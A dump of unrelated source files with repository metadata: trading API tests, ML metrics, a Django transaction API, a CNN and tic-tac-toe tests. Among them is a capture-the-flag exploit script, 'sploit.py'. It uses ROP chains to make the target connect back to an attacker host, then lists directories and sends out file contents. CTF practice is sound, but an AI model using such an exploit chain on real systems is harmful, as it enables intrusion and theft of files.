#pocket = drill_holes(pocket, holes_4d40, DRILL_4D40)
# export STEP file
box.exportStep("klein_al_hptr_box.stp")
if __name__ == '__main__':
main()
|
[
"jtklein@alaska.edu"
] |
jtklein@alaska.edu
|
9fda1a33b05de313c29b969f23ddb11187a608ef
|
d3efc82dfa61fb82e47c82d52c838b38b076084c
|
/Autocase_Result/ETFMM_K/YW_ETFMM_SHXJ_037_K.py
|
6cafe2a50769ad870d3f93965281ee3afa7ef5a5
|
[] |
no_license
|
nantongzyg/xtp_test
|
58ce9f328f62a3ea5904e6ed907a169ef2df9258
|
ca9ab5cee03d7a2f457a95fb0f4762013caa5f9f
|
refs/heads/master
| 2022-11-30T08:57:45.345460
| 2020-07-30T01:43:30
| 2020-07-30T01:43:30
| 280,388,441
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 2,261
|
py
|
#!/usr/bin/python
# -*- encoding: utf-8 -*-
import sys
sys.path.append("/home/yhl2/workspace/xtp_test/xtp/api")
from xtp_test_case import *
sys.path.append("/home/yhl2/workspace/xtp_test/service")
from ServiceConfig import *
from mainService import *
from log import *
sys.path.append("/home/yhl2/workspace/xtp_test/mysql")
from SqlData_Transfer import *
sys.path.append("/home/yhl2/workspace/xtp_test/utils")
from env_restart import *
from QueryOrderErrorMsg import queryOrderErrorMsg
class YW_ETFMM_SHXJ_037_K(xtp_test_case):
# YW_ETFMM_SHXJ_037_K
def test_YW_ETFMM_SHXJ_037_K(self):
title='上海A股股票交易日限价委托买-不存在的证券代码'
#定义当前测试用例的期待值
#期望状态:初始、未成交、部成、全成、部撤已报、部撤、已报待撤、已撤、废单、撤废、内部撤单
#xtp_ID和cancel_xtpID默认为0,不需要变动
case_goal = {
'期望状态': '废单',
'errorID': 11000010,
'errorMSG': queryOrderErrorMsg(11000010),
'是否生成报单': '是',
'是否是撤废': '否',
'xtp_ID': 0,
'cancel_xtpID': 0,
}
logger.warning(title)
# 定义委托参数信息------------------------------------------
wt_reqs = {
'business_type':Api.const.XTP_BUSINESS_TYPE['XTP_BUSINESS_TYPE_CASH'],
'order_client_id':2,
'market': Api.const.XTP_MARKET_TYPE['XTP_MKT_SH_A'],
'ticker': '000000',
'side': Api.const.XTP_SIDE_TYPE['XTP_SIDE_BUY'],
'price_type': Api.const.XTP_PRICE_TYPE['XTP_PRICE_LIMIT'],
'price': 10.00,
'quantity': 200,
'position_effect': Api.const.XTP_POSITION_EFFECT_TYPE['XTP_POSITION_EFFECT_INIT']
}
ParmIni(Api,case_goal['期望状态'],wt_reqs['price_type'])
rs = serviceTest(Api, case_goal, wt_reqs)
logger.warning('执行结果为' + str(rs['用例测试结果']) + ',' + str(rs['用例错误源']) + ',' + str(rs['用例错误原因']))
self.assertEqual(rs['用例测试结果'], True) # 2
if __name__ == '__main__':
unittest.main()
|
[
"418033945@qq.com"
] |
418033945@qq.com
|
54521e4ec1133558c781759b21b0d92694377dd1
|
815a3dd3d3c84c6baf9f49b9a9fb5c125584d5e7
|
/2nd year/IA/lab6-EVAL-ML/main.py
|
b521d38687beeaa986ef43ad34e1ab5219ee5453
|
[] |
no_license
|
Tonissonn/college-ubb-labs
|
c97bbbe48adbcbfe9b8a0bbfc77149c0535411d6
|
87b05fc4033868d1e9d3553e001f0ef821016b1f
|
refs/heads/main
| 2023-08-01T01:49:03.656923
| 2021-09-13T11:48:46
| 2021-09-13T11:48:46
| null | 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 4,243
|
py
|
from math import log
def prediction_error(real_outputs, computed_outputs):
from math import sqrt
return sqrt(sum([x ** 2 for x in
[sqrt(sum((real - computed) ** 2 for real, computed in zip(real_outputs[i], computed_outputs[i]))
/ len(real_outputs[i])) for i in range(len(real_outputs))]]) / len(real_outputs))
def compute_dict(labels, values):
row = {}
for label in labels:
if values == 'dict':
row[label] = {}
else:
row[label] = 0
return row
def confusion_matrix(real, computed, labels):
cm = compute_dict(labels, 'dict')
for label in labels:
row = compute_dict(labels, 'numeric')
for i in range(len(real)):
if real[i] == label:
row[computed[i]] += 1
cm[label] = row
return cm
def accuracy_precision_recall(real_labels, computed_labels, label_names):
cm = confusion_matrix(real_labels, computed_labels, label_names)
accuracy = sum([1 if real_labels[i] == computed_labels[i] else 0
for i in range(0, len(real_labels))]) / len(real_labels)
precision = {}
recall = {}
for label in label_names:
precision[label] = cm[label][label] / sum(x[label] for x in cm.values())
recall[label] = cm[label][label] / sum(x for x in cm[label].values())
return cm, accuracy, precision, recall
# using MSE = mean squared error
def regression_loss(real, computed):
return sum([(real[i] - computed[i]) ** 2 for i in range(len(real))]) / len(real)
def binary_loss(real, computed):
return -sum([real[i] * log(computed[i][0]) + (1 - real[i]) * log(computed[i][1]) for i in range(len(real))]) / len(
real)
def multi_class_loss(real, computed):
return -sum([log(1e-15 + computed[i][real[i]]) for i in range(len(real))]) / len(real)
def float_xor(a, b):
import struct
rtrn = []
a = struct.pack('d', a)
b = struct.pack('d', b)
for ba, bb in zip(a, b):
rtrn.append(ba ^ bb)
return struct.unpack('d', bytes(rtrn))[0]
def multi_label_loss(real, computed):
return sum(
[sum([float_xor(real[i][j], computed[i][j]) for j in range(len(real[i]))]) for i in range(len(real))]) / (
len(real) * len(real[0]))
# prediction error
real_for_error = [[533, 1000, 89], [577, 1103, 76], [550, 1523, 43], [520, 1300, 13], [530, 1530, 65], [589, 1050, 83]]
computed_for_error = [[529, 1000, 88], [577, 1113, 76], [540, 1600, 54], [523, 1299, 13], [545, 1505, 68],
[601, 1065, 76]]
print(prediction_error(real_for_error, computed_for_error))
print()
# accuracy, prediction, recall
real_for_apr = ['a', 'a', 'b', 'c', 'b', 'c', 'a', 'a', 'b', 'c', 'a']
computed_for_apr = ['a', 'a', 'c', 'c', 'a', 'c', 'b', 'a', 'b', 'a', 'c']
names_for_apr = ['a', 'b', 'c']
c, a, p, r = accuracy_precision_recall(real_for_apr, computed_for_apr, names_for_apr)
print(str(c))
print(str(a))
print(str(p))
print(str(r) + '\n')
# regression loss
real_for_regloss = [15, 85, 73, 22, 35, 56, 43, 72]
computed_for_regloss = [17, 85, 78, 31, 35, 55, 43, 74]
print(regression_loss(real_for_regloss, computed_for_regloss))
# binary classifier loss
real_for_binaryloss = [1, 0, 0, 0, 1, 1, 1, 1, 0]
computed_for_binaryloss = [[.1, .9], [.7, .3], [.2, .8], [.9, .1], [.8, .2], [.5, .5], [.3, .7], [.2, .8], [.9, .1]]
print(binary_loss(real_for_binaryloss, computed_for_binaryloss))
# multiclass classifier loss
real_for_multiclassloss = [3, 1, 1, 2, 0, 0, 1, 3, 3, 2, 0]
computed_for_multiclassloss = [[.25, .25, .25, .25], [.0, .7, .2, .1], [.1, .6, .1, .2], [.3, .3, .2, .2],
[.7, .0, .0, .3], [.5, .5, .0, .0], [.2, .8, .0, .0], [.0, .1, .9, .0], [.0, .2, .8, .0],
[.1, .1, .7, .1], [.6, .2, .2, .0]]
print(multi_class_loss(real_for_multiclassloss, computed_for_multiclassloss))
# multi-label classifier loss - limit is 0.4
real_for_multilabelloss = [[1, 1, 1, 0], [0, 1, 0, 1], [0, 1, 0, 0], [1, 1, 0, 1]]
computed_for_multilabelloss = [[.9, .5, .4, .2], [.2, .7, .2, .8], [.1, .5, .2, .3], [.9, .7, .2, .4]]
print(multi_label_loss(real_for_multilabelloss, computed_for_multilabelloss))
|
[
"radu_vintila20@yahoo.com"
] |
radu_vintila20@yahoo.com
|
ad7b3f0e40711a9ff2d2a74e6224f2657ac0416a
|
8a3fa4fc5bcf61b107db9c9de25f7e41f261cc05
|
/pwn/blacklist/soln/sploit.py
|
f8bf79fbfb6cb55d33e726533b93b6ea705b6559
|
[
"CC-BY-4.0",
"MIT"
] |
permissive
|
nghialuffy/pbctf-2020-challs
|
bde7ea47de1488b0509a64f7b0fff2297ced7e04
|
a2bea96ee80c256ed4a0a8d2dad263b346ddbf0a
|
refs/heads/master
| 2023-01-31T02:38:50.242870
| 2020-12-16T17:27:46
| 2020-12-16T17:27:46
| null | 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 7,306
|
py
|
# CTF: playtesting for theKidOfAcrania
# Task: Hard ROP
# Exploit-By: braindead <braindeaded@protonmail.com>
from pwn import *
import gadgets as g
import linux
from collections import defaultdict, namedtuple
import shlex
sc = linux.syscalls(mode='_32')
deflabel = namedtuple('deflabel', ['name'])
pad_to = namedtuple('pad_to', ['addr'])
LABELS = {}
class L:
def __getattr__(self, x):
global L
return LABELS[x]
L = L()
def pad(n=4): return ("Lain"*((n+3)/4))[-n:]
rop_i = 0
def pack(xs, maxlen=100):
global LABELS
pos = 0
for x in xs:
if isinstance(x, deflabel):
LABELS[x.name] = pos
#print('label %s = 0x%03x'%(x.name, pos))
elif isinstance(x, pad_to):
assert pos <= x.addr
pos = x.addr
elif isinstance(x, int):
pos += 4
elif callable(x):
pos += 4
else:
pos += len(x)
b = ''
for x in xs:
if isinstance(x, deflabel):
assert len(b) == LABELS[x.name]
continue
if isinstance(x, pad_to):
assert x.addr >= len(b)
x = pad(x.addr - len(b))
elif callable(x):
LABELS['here'] = len(b)
x = x()
if isinstance(x, int):
x = p32(x)
b += x
global rop_i
rop_i += 1
with open('rop%i.bin'%rop_i, 'wb') as f:
f.write(b)
if len(b) > maxlen:
warn('ropchain too long (%i)'%len(b))
return b
VULN = 0x0804891f
PUSH_ESP_CALL_EDI = 0x0807883e # push esp ; call edi ;
SOCKADDR = 0x00002078 + 0x080d8000
SCRATCH = 0x080d8000
TCP_PARAMS = 0x080d9c18
UDP_PARAMS = 0x080d9ec0
LHOST = list(map(int, args.LHOST.split('.')))
LPORT = int(args.LPORT)
LHOST = u32(''.join(map(chr, LHOST)))
LPORT = (LPORT&0xFF)*0x100 + (LPORT>>8)
ADD_EAX_EDX = 0x08068263 # add eax, edx ; ret ;
SUB_EAX_0X10_POP_EDI = 0x08091bd8 # sub eax, 0x10 ; pop edi ; ret ;
SUB_EDX_0X10_POP_EDI = 0x0806791b # sub edx, 0x10 ; jb 0x80679f0 ; lea eax, [edi + 0xf] ; pop edi ; ret ;
MOVSD = 0x080c0e91 # movsd dword ptr es:[edi], dword ptr [esi] ; ret ;
SHITTY_WRITE = 0x080a8f2b # add dword ptr [edx + 1], ebp ; call eax ;
SOCKETCALL = 0x0806f049 # useless due to canary
VSYSCALL_POP_EBX = 0x0806cdbe
ADDR_OF_MINUS_36 = 0x080abd1a
READ_WITH_SIZE = 0x0804892a
rop = pack([
# 5 free slots:
g.POP_ECX_EBX, SOCKADDR, 3, # SYS_CONNECT
g.VSYSCALL,
VULN,
pad_to(20),
g.POP_EDI, g.POP_EBX_EBP_ESI_EDI,
PUSH_ESP_CALL_EDI,
# struct sockaddr_in (also popped into ESI and EDI)
p16(2), p16(LPORT), LHOST,
g.POP_EAX_EDX_EBX, g.POP_EDX_ECX_EBX, SOCKADDR+4-1, pad(),
SHITTY_WRITE, # -> pop ecx; pop ebx
# socket(AF_INET, SOCK_STREAM, 0) -> 0
TCP_PARAMS, 1, # SYS_SOCKET
g.POP_EAX, sc.socketcall,
VSYSCALL_POP_EBX,
ADDR_OF_MINUS_36-10,
g.ADD_EBP_DWORD_PTR_EBX_0XA_,
# now ebp points to start of buffer
# 2 free slots:
g.POP_EAX, sc.socketcall,
# pivot to ebp
g.LEAVE
])
info('rop size: %d/100'%len(rop))
rop2 = pack([
'ROP2',
pad_to(16), (-16)&0xffffffff,
g.POP_EAX, sc.socketcall,
g.POP_EDX_EBX, # to skip sockaddr
p16(2), p16(LPORT), LHOST,
g.POP_ECX_EBX, TCP_PARAMS, 1, # SYS_SOCKET
g.VSYSCALL,
g.POP_EAX, sc.socketcall,
g.POP_ECX_EBX, SOCKADDR, 3, # SYS_CONNECT
g.VSYSCALL,
# restore ebp
g.POP_ESI, SOCKADDR+4-10,
g.ADD_EBP_DWORD_PTR_ESI_0XA_,
READ_WITH_SIZE, 0x10000,
pad_to(100),
])
info('rop2 size: %d/100'%len(rop2))
base = './flag_dir'
if args.LOCAL:
r = remote('127.0.0.1', 8888)
elif args.RHOST:
base = '/flag_dir'
#r = remote('172.17.0.2', 1337)
r = remote(args.RHOST, args.RPORT)
pass
else:
p = process(['strace']+shlex.split(args.STRACE)+['-o', 'trace', '-f', './blacklist']); r = p
l = listen(int(args.LPORT))
r.send(rop)
info('sent stage 1')
r = l.wait_for_connection()
l = listen(int(args.LPORT))
r.send(rop2)
info('sent stage 2')
r = l.wait_for_connection()
INT80 = 0x806fa30
rop_state = 0
def exec_rop(tag, text, data=[]):
global rop_state
rop_state ^= 1
rop3 = pack(
[
tag,
pad_to(0x34 - 40),
deflabel('loader'),
g.POP_EBP, SOCKADDR+4-2,
g.POP_EAX, sc.read,
g.POP_EDX_ECX_EBX, 0x10000, (-32)&0xffffffff, 0,
g.ADD_ECX_DWORD_PTR_EBP_2_, # ecx = &rop
INT80,
]
+ #([g.RET, g.VSYSCALL] if rop_state == 1 else [g.VSYSCALL, g.RET]) +
[
pad_to(0x34)
]
+ text +
[
# pivot esp to the loader in front for the payload
g.POP_ECX_EBX, lambda: (L.loader-32)&0xffffffff, 0,
g.POP_EBP, SOCKADDR+4-2,
g.ADD_ECX_DWORD_PTR_EBP_2_, # ecx = &rop
g.MOV_ESP_ECX,
]
+ data +
[
], maxlen=0x10000)
#info('sending %d byte %s payload'%(len(rop3), tag))
r.send(rop3)
def list_dir(dir_path):
info('listing '+repr(dir_path))
exec_rop('OPENDIR',
text = [
g.POP_EAX, sc.open,
g.POP_EDX_ECX_EBX, 0, 0, lambda: L.path - 32,
g.POP_ESI, SOCKADDR+4-10,
g.POP_EBP, 0,
g.ADD_EBP_DWORD_PTR_ESI_0XA_, # ebp = &sin
g.ADD_EBX_EBP, # ebx = &path
INT80,
g.POP_EDX_ECX_EBX, 1, lambda: (L.path-32)&0xffffffff, 0,
g.POP_EBP, SOCKADDR+4-2,
g.ADD_ECX_DWORD_PTR_EBP_2_, # ecx = &buffer
g.POP_EAX, sc.write,
g.VSYSCALL,
],
data = [
deflabel('path'),
dir_path, '\x00',
]
)
r.recv(1) # sync to prevent tcp merging
entries = []
prev_name = None
while True:
exec_rop('READDIR',
text = [
# readdir(1, &buffer, 1)
g.POP_EDX_ECX_EBX, 1, lambda: (L.buffer-32)&0xffffffff, 1,
g.POP_EBP, SOCKADDR+4-2,
g.ADD_ECX_DWORD_PTR_EBP_2_, # ecx = &buffer
g.POP_EAX, sc.readdir,
g.VSYSCALL,
# write(0, &buffer, 262)
g.POP_EDX_ECX_EBX, 266, lambda: (L.buffer-32)&0xffffffff, 0,
g.POP_EBP, SOCKADDR+4-2,
g.ADD_ECX_DWORD_PTR_EBP_2_, # ecx = &buffer
g.POP_EAX, sc.write,
g.VSYSCALL,
],
data = [
deflabel('buffer'),
]
)
dirent = r.recv(266)
name = dirent[10:10+u16(dirent[8:10])]
if name == prev_name:
break
prev_name = name
entries.append(name)
#success('entry %s'%repr(name))
exec_rop('CLOSE',
text = [
g.POP_EAX, sc.close,
g.POP_EBX, 1,
INT80,
],
)
return entries
def get_file(path):
exec_rop('READ',
text = [
# open(path, 0, 0) => 1
g.POP_EAX, sc.open,
g.POP_EDX_ECX_EBX, 0, 0, lambda: L.path - 32,
g.POP_ESI, SOCKADDR+4-10,
g.POP_EBP, 0,
g.ADD_EBP_DWORD_PTR_ESI_0XA_, # ebp = &sin
g.ADD_EBX_EBP, # ebx = &path
INT80,
# read(1, &buffer, 64)
g.POP_EDX_ECX_EBX, 64, lambda: (L.buffer-32)&0xffffffff, 1,
g.POP_EBP, SOCKADDR+4-2,
g.ADD_ECX_DWORD_PTR_EBP_2_, # ecx = &buffer
g.POP_EAX, sc.read,
INT80,
# edx = eax
g.POP_EDX, g.POP_EBX_EDX,
g.PUSH_EAX_CALL_EDX,
# write(0, &buffer, n)
g.POP_ECX_EBX, lambda: (L.buffer-32)&0xffffffff, 0,
g.POP_EBP, SOCKADDR+4-2,
g.ADD_ECX_DWORD_PTR_EBP_2_, # ecx = &buffer
g.POP_EAX, sc.write,
INT80,
# close(1)
g.POP_EAX, sc.close,
g.POP_EBX, 1,
INT80,
],
data = [
deflabel('path'),
deflabel('buffer'),
path, '\x00',
]
)
return r.recvline()
dir0 = list_dir(base)
files = []
for x in dir0:
if x in ['.', '..']: continue
dir1 = list_dir(base+'/'+x)
for y in dir1:
if y in ['.', '..']: continue
dir2 = list_dir(base+'/'+x+'/'+y)
for z in dir2:
if z in ['.', '..']: continue
files.append(base+'/'+x+'/'+y+'/'+z)
success('got %i files'%len(files))
flags_sink = open('flags.txt', 'w')
flags = []
info("dumping flags to flags.txt")
for f in files:
x = get_file(f)
flags_sink.write(x)
flags.append(x)
for f in flags:
if '{' in f:
success('FLAG: '+repr(f))
exec_rop('EXIT', [ g.POP_EAX, sc.exit, g.POP_EBX, 0, INT80 ])
r.close()
#p.wait()
|
[
"sampritipanda@outlook.com"
] |
sampritipanda@outlook.com
|
4e2d4d03f74582bc290b043e3f4267c4fa3cc589
|
1b38e2a313204b757496eaf6bf28770db8dd39db
|
/app/views.py
|
16a7676882d0aba0023b9d6ba833d7fa03ea5d1a
|
[] |
no_license
|
araujooj/transaction-api-django
|
4b10a3184f3c1f8a82a0500a142ac036f09abe7d
|
de40c1328223fc01b4028b4219ac831acc82a08b
|
refs/heads/master
| 2023-02-21T16:29:31.194071
| 2021-01-27T12:30:20
| 2021-01-27T12:30:20
| 333,413,770
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 2,140
|
py
|
from rest_framework.response import Response
from rest_framework import status
from rest_framework.views import APIView
from rest_framework.exceptions import NotFound
from app.models import Transaction
from app.serializers import TransactionSerializer
from functools import reduce
class TransactionListAndCreate(APIView):
def get(self, request):
transaction = Transaction.objects.all()
serializer = TransactionSerializer(transaction, many=True)
outcome_list = [item.value for item in transaction if item.type == 'outcome']
outcome_value = reduce(lambda x, y: x + y, outcome_list, 0)
income_list = [item.value for item in transaction if item.type == 'income']
income_value = reduce(lambda x, y: x + y, income_list, 0)
total = income_value - outcome_value
return Response({
'transactions': serializer.data,
'wallet': {
'income': income_value,
'outcome': outcome_value,
'total': total
}})
def post(self, request):
serializer = TransactionSerializer(data=request.data)
if serializer.is_valid():
serializer.save()
return Response(serializer.data, status=status.HTTP_201_CREATED)
return Response(serializer.errors, status=status.HTTP_400_BAD_REQUEST)
class TransactionUpdateAndDelete(APIView):
def get_object(self, pk):
try:
return Transaction.objects.get(pk=pk)
except Transaction.DoesNotExist:
raise NotFound()
def get(self, request, pk):
serializer = TransactionSerializer(self.get_object(pk))
return Response(serializer.data)
def put(self, request, pk):
serializer = TransactionSerializer(self.get_object(pk), data=request.data)
if serializer.is_valid():
serializer.save()
return Response(serializer.data)
return Response(serializer.errors, status=status.HTTP_400_BAD_REQUEST)
def delete(self, request, pk):
self.get_object(pk).delete()
return Response(status=status.HTTP_204_NO_CONTENT)
|
[
"gabriel@kenzie.com.br"
] |
gabriel@kenzie.com.br
|
57f2d53fece733ed42ba3a2d06d8663a6e9019ed
|
e3013ce104d6c3188d51e7da5c14f455d0de8825
|
/algorithms/sort/02_QuickSort.py
|
b2f6c2fe6b746126686177583a7848381bdaf421
|
[] |
no_license
|
whztt07/LearningNotes
|
73c9ea22a3d4efee0b2f1b508a2b5a5589aa5c22
|
250a5e1d094e57e7fd36fa244d0fdd985083ea28
|
refs/heads/master
| 2020-05-31T14:51:25.672031
| 2018-09-18T08:10:50
| 2018-09-18T08:10:50
| null | 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 318
|
py
|
def quicksort(seq):
if len(seq)<=1:
return seq
pivot = seq[0]
lseq = [seq[i] for i in xrange(1,len(seq)) if seq[i]<pivot]
rseq = [seq[i] for i in xrange(1,len(seq)) if seq[i]>=pivot]
lseq = quicksort(lseq)
rseq = quicksort(rseq)
seq = lseq+[pivot]+rseq
return seq
seq = [2,7,1,0,8,4,6]
print quicksort(seq)
|
[
"yucicheung@gmail.com"
] |
yucicheung@gmail.com
|
0026db84ebcfa42870b8b26a69006d371809c47b
|
83c630867d539e33d770e2a0b31e9c5094965ee4
|
/py/AllBoxxProduct.py
|
7089e545dad7c6b557b580b3cae95344e30a8a2d
|
[] |
no_license
|
max-toth/allboxx-crawler
|
7a805f01ef45dfa572ac4cd760d0371a815c2a5e
|
effc1b069d204e64ad9a46b8260bbf1718041da2
|
refs/heads/master
| 2021-05-27T13:38:29.584139
| 2014-08-12T10:40:36
| 2014-08-12T10:40:36
| null | 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 1,234
|
py
|
import threading
import time
import AllBoxxParser
import AllBoxxSingleton
import OnlyOne
exitFlag = 0
rows = 17865
class bcolors:
HEADER = '\033[95m'
OKBLUE = '\033[94m'
OKGREEN = '\033[92m'
WARNING = '\033[93m'
FAIL = '\033[91m'
ENDC = '\033[0m'
class myThread (threading.Thread):
def __init__(self, threadID, name, urls, lines):
threading.Thread.__init__(self)
self.threadID = threadID
self.name = name
self.urls = urls
self.lines = lines
def run(self):
prds = AllBoxxSingleton.AllBoxxSingleton()
failed = OnlyOne.OnlyOne()
items = []
for url in self.urls:
current_item = url.split(';')[3]
try:
updated_line = url.replace('\n', '') + ";" + AllBoxxParser.products(current_item)
print(current_item)
items.append(updated_line)
except Exception as e:
print(bcolors.FAIL + current_item + ' in Thread ' + self.name + bcolors.ENDC + ' ' + str(e))
self.urls.append(url)
time.sleep(5)
f = open(self.name + '.csv', 'w')
for x in items:
f.write(x)
f.close()
|
[
"maxim.v.tolstyh@gmail.com"
] |
maxim.v.tolstyh@gmail.com
|
40d3c003cfd438165197d7f4ef2e0e96c543d6e1
|
a62eea622d7fa0486e30155020fa77addc8cec64
|
/e-nose-cnn/cnndw.py
|
e310e0b1f8adc7581ca7ca569897dfdb6305d5b6
|
[] |
no_license
|
19120332843/learning_python
|
42004a1921101dc6bb4c1fee2f0455c9f0ceea7e
|
5f26942ccafb49cc08d348e2360711e842bfa8e6
|
refs/heads/master
| 2022-11-07T06:38:36.296724
| 2020-06-29T14:06:23
| 2020-06-29T14:06:23
| null | 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 5,545
|
py
|
# -*- coding:utf-8 -*-
import pandas as pd
import torch
import numpy as np
import torch.nn as nn
import torch.nn.functional as F
import torch.optim as optim
import torch.nn.init as init
from torch.autograd import Variable
import os
import sklearn
from sklearn.model_selection import train_test_split
def Normlize(Z):
Zmax, Zmin = Z.max(axis=1), Z.min(axis=1)
Zmean = Z.mean(axis=1)
#按列排序
Zmax, Zmin = Zmax.reshape(-1, 1), Zmin.reshape(-1, 1)
Zmean = Zmean.reshape(-1, 1)
Z = (Z - Zmean) / (Zmax - Zmin)
return Z
def Data_Reading(Normalization=True):
data = np.load('codedata//3times//dataset.npy')
label = np.load('codedata//3times//label.npy')
# Normalization
data = Normlize(data)
if Normalization:
data = torch.from_numpy(data).type(torch.cuda.FloatTensor)
label = torch.from_numpy(label).type(torch.int64)
# reshape
data = data.view(700, 10, 1, 120)
data = data.cpu().numpy()
label = label.numpy()
train_x, test_x, train_y, test_y = train_test_split(data, label, test_size=0.25)
train_x = torch.from_numpy(train_x).type(torch.cuda.FloatTensor)
test_x = torch.from_numpy(test_x).type(torch.cuda.FloatTensor)
train_y = torch.from_numpy(train_y).type(torch.int64)
test_y = torch.from_numpy(test_y).type(torch.int64)
return train_x, test_x, train_y, test_y
class hswish(nn.Module):
def forward(self, x):
out = x * F.relu(x + 3) / 4
return out
class Net(nn.Module):
def __init__(self):
super(Net, self).__init__()
self.conv1d = nn.Conv2d(in_channels = 10, out_channels = 10, kernel_size = (1, 3), stride = 1, groups = 10)#(120 - 3)/1 + 1 = 118
self.conv1p = nn.Conv2d(in_channels = 10, out_channels = 6, kernel_size = 1, stride = 1, groups = 1)
self.hswish1 = hswish()
self.conv2d = nn.Conv2d(in_channels = 6, out_channels = 6, kernel_size = (1, 2), stride = 1, groups = 6)#(59 - 2)/1 + 1 = 58
self.conv2p = nn.Conv2d(in_channels = 6, out_channels = 10, kernel_size = 1, stride = 1, groups = 1)
self.hswish2 = hswish()
self.fc1 = nn.Linear(10*29, 7)#10*29是一个样本最后出来的数据量的个数,7--分7类
for m in self.modules():
if isinstance(m, nn.Conv2d):
init.xavier_uniform_(m.weight)
init.constant_(m.bias, 0)
elif isinstance(m, nn.Linear):
init.normal_(m.weight, std=0.001)
def forward(self, x):
#10*1*120
x = self.conv1d(x)
x = F.relu(x)
#10*1*118
x = self.conv1p(x)
x = self.hswish1(x)
#6*1*118
x = F.max_pool2d(x, (1, 2))
#6*1*59
x = self.conv2d(x)
x = F.relu(x)
#6*1*58
x = self.conv2p(x)
x = self.hswish2(x)
#10*1*58
x = F.max_pool2d(x, (1, 2))
#10*1*29
x = x.view(x.size(0), -1)
#290
x = self.fc1(x)
return x#
if __name__ == '__main__':
device = torch.device("cuda:0" if torch.cuda.is_available() else "cpu")#cuda:0
print(device)
cnn = Net()
# print(cnn)
cnn.to(device)
#sgd -> stochastic gradient descent
lrr = 0.01
mom = 0.9
optimizer = optim.SGD(cnn.parameters(), lr=lrr, momentum=mom)#
scheduler = optim.lr_scheduler.MultiStepLR(optimizer, milestones = [200,260], gamma=0.1)
loss_func = nn.CrossEntropyLoss()#CrossEntropyLoss()
train_x, test_x, train_y, test_y = Data_Reading(Normalization=1)
train_y = train_y.squeeze()
test_y = test_y.squeeze()
train_x = train_x.to(device)
test_x = test_x.to(device)
train_y = train_y.to(device)
test_y = test_y.to(device)
#train
sum = 0
max = 0
batch_size = 21
tr_x = Variable(train_x)
tr_y = Variable(train_y)
for epoch in range(300):
running_loss = 0.0
for i in range(0,(int)(len(train_x)/batch_size)):
t_x = Variable(train_x[i*batch_size:i*batch_size+batch_size])
t_y = Variable(train_y[i*batch_size:i*batch_size+batch_size])
out = cnn(t_x)
loss = loss_func(out, t_y)
optimizer.zero_grad()
loss.backward()
optimizer.step()
running_loss += loss.item()
running_loss = running_loss / 25
out = cnn(tr_x)
predicted_train = torch.max(out.data, 1)[1]
total_train = tr_y.size(0)#总数
for j in range(tr_y.size(0)):
if predicted_train[j] == tr_y[j]:
sum += 1
print('total_train:{}, accuracy:{}, sum:{}'.format(total_train, sum / total_train, sum))
sum = 0
scheduler.step()
print('Epoch[{}], loss: {:.8f}'.format(epoch + 1, running_loss))
# print(optimizer)
#test
te_x = Variable(test_x)
te_y = Variable(test_y)
out1 = cnn(te_x)
predicted_test = torch.max(out1.data, 1)[1]#.data.squeeze()
total = te_y.size(0)
for j in range(te_y.size(0)):
if predicted_test[j] == te_y[j]:
sum += 1
if(max < sum/total):
max = sum/total
maxepoch = epoch + 1
torch.save(cnn, './net/mobilenet627.pkl')
print('total:{}, accuracy:{}, sum:{}, max={}, maxepoch={}'.format(total, sum / total, sum, max, maxepoch))
print('=============================================================================')
sum = 0
|
[
"1345238761@qq.com"
] |
1345238761@qq.com
|
45fd8141325bc59f611d12b4c37c99c4121032cd
|
bc5fb02217c23cf169537dd8c64b096d2c0a972f
|
/test/practise_python/test_TicTakToe.py
|
09620e432f81ec84087fd5cd597bd1ea42d8b977
|
[] |
no_license
|
BasilBibi/PY-scratch
|
c554b60f900b8e28968c06183739e51af1a92c18
|
cb176a284eef8b0db5ac291130fd9fb91d4537d1
|
refs/heads/develop
| 2021-04-15T07:15:29.894804
| 2020-04-08T12:01:12
| 2020-04-08T12:01:12
| 126,475,452
| 1
| 1
| null | 2019-10-23T12:47:44
| 2018-03-23T11:21:30
|
Python
|
UTF-8
|
Python
| false
| false
| 4,393
|
py
|
import unittest
from py_scratch.practise_python.GameBoard import TicTakToe, RowPopulation, ColPopulation, DiagPopulation
def make_board(size, init_char):
b = []
for i in range(size):
b.append([init_char] * size)
return b
class TicTakToeTests(unittest.TestCase):
def test_cons(self):
ttt3 = TicTakToe()
self.assertEqual([[' ', ' ', ' '],
[' ', ' ', ' '],
[' ', ' ', ' ']], ttt3.board)
def test_get_row_sets(self):
board = make_board(3, ' ')
expected = [RowPopulation(0, set(' ')),
RowPopulation(1, set(' ')),
RowPopulation(2, set(' '))]
self.assertEqual( expected, TicTakToe().get_row_sets(board) )
def test_get_row_sets_diffs(self):
board = [[' ', 'X', 'O'],
[' ', 'X', 'O'],
[' ', 'X', 'O']]
expected = [RowPopulation(0, set({' ', 'X', 'O'})),
RowPopulation(1, set({' ', 'X', 'O'})),
RowPopulation(2, set({' ', 'X', 'O'}))]
self.assertEqual( expected, TicTakToe().get_row_sets(board))
def test_get_col_sets(self):
board = [[' ', 'X', 'O'],
[' ', 'X', 'O'],
[' ', 'X', 'O']]
expected = [ColPopulation(0, set({' '})),
ColPopulation(1, set({'X'})),
ColPopulation(2, set({'O'}))]
self.assertEqual( expected, TicTakToe().get_col_sets(board))
def test_get_diag_sets(self):
board = [[' ', ' ', ' '],
[' ', ' ', ' '],
[' ', ' ', ' ']]
expected = [DiagPopulation('FwdSlash', set({' '})),
DiagPopulation('BkSlash', set({' '}))]
self.assertEqual( expected, TicTakToe().get_diag_sets(board))
def test_get_diag_sets_diff(self):
board = [[' ', 'X', 'O'],
[' ', 'X', 'O'],
[' ', 'X', 'O']]
expected = [DiagPopulation('FwdSlash', set({' ', 'X', 'O'})),
DiagPopulation('BkSlash', set({' ', 'X', 'O'}))]
self.assertEqual( expected, TicTakToe().get_diag_sets(board))
def test_is_validPopulation_len_not_ok(self):
ttt=TicTakToe()
pop = set({'a', 'b'})
self.assertFalse( ttt.is_valid_population(pop) )
def test_is_validPopulation_len_ok(self):
ttt=TicTakToe()
pop = set('a')
self.assertTrue( ttt.is_valid_population(pop) )
def test_is_validPopulation_len_ok_character_ok(self):
